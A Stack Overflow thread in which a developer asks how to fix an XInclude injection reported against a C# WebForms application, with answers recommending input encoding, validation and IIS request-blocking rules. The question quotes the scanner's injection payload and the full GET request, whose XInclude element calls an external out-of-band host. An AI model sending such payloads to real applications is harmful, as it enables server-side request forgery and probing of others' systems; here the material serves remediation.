1

I got a vulnerability report.

XML is injected in the URL "XInclude". I'm trying to find a validation to prevent the XML to be executed. My web application is built using Visual Studio C# with webforms.

I was thinking to validate this from the web.config or IIS. I'm not sure if I have to add code to validate or parse the XML.

Issue detail:

The URL path filename appears to be vulnerable to XML injection. The payload:

<mhx xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://o6vsilg7waiopz0impyw3z2cn3twho5ptgl3br0.burpcollaborator.net/foo"/></mhx>

was sent to the server. This payload contains some XML that references a URL on an external domain. The application interacted with that domain, indicating that the parser processed the injected XML.

Request

GET /Edit/Employee/%3cmhx%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a//o6vsilg7waiopz0impyw3z2cn3twho5ptgl3br0.burpcollaborator.net/foo%22/%3e%3c/mhx%3e?RequestId=428 HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Marco Bonelli
  • 63,369
  • 21
  • 118
  • 128
Jay
  • 69
  • 2
  • 4
  • You need to create separate [MCVE] that produces the same behavior and behaves similarly to your application. Without code it is not possible to know how you load XML. Just adding link to XML file in a url by itself will never introduce security issue. – Alexei Levenkov Aug 26 '20 at 20:52
  • Did you try this code? @Jay – dcansyn Aug 26 '20 at 21:36
  • Check this similar question https://stackoverflow.com/questions/6381689/how-to-prevent-xpath-xml-injection-in-net – Aristos Aug 26 '20 at 22:29

2 Answers2

0

You have not included the relevant part of your code in the question, nor have you added much context, so it cannot be answered more precisely than below.

  1. You need to properly encode (with XML encoding) the parameter before writing it into the xml file that then gets processed. Encoding is your first line of defense. That unfortunately is not straightforward at all in C#, and depends on where exactly user input will be written in your XML.

  2. In addition to that, you should validate your input. In the URL above I guess what you are expecting is an Employee id, probably a number. If it is a number, you should validate that before using it. If it's not a number, you can probably still validate it (for example length, character set, format) so that malformed input will not be processed.

These two (well, most probably even one of them) would prevent the vulnerability.

Gabor Lengyel
  • 14,129
  • 4
  • 32
  • 59
0

It is possible to use URL Rewrite in IIS to do that, there is an article in Microsoft website explaining how it is being done. You may have a look at the following article: https://learn.microsoft.com/en-us/iis/extensions/url-rewrite-module/request-blocking-rule-template. It depends on your website's configuration and architecture, you may add some codes to validate it but for that , you have to share how you are handling these requests in your code. One way would be using regular expression and convert injectable characters to something else. For example, you may use URL encode too.

Robert Morris
  • 1
  • 1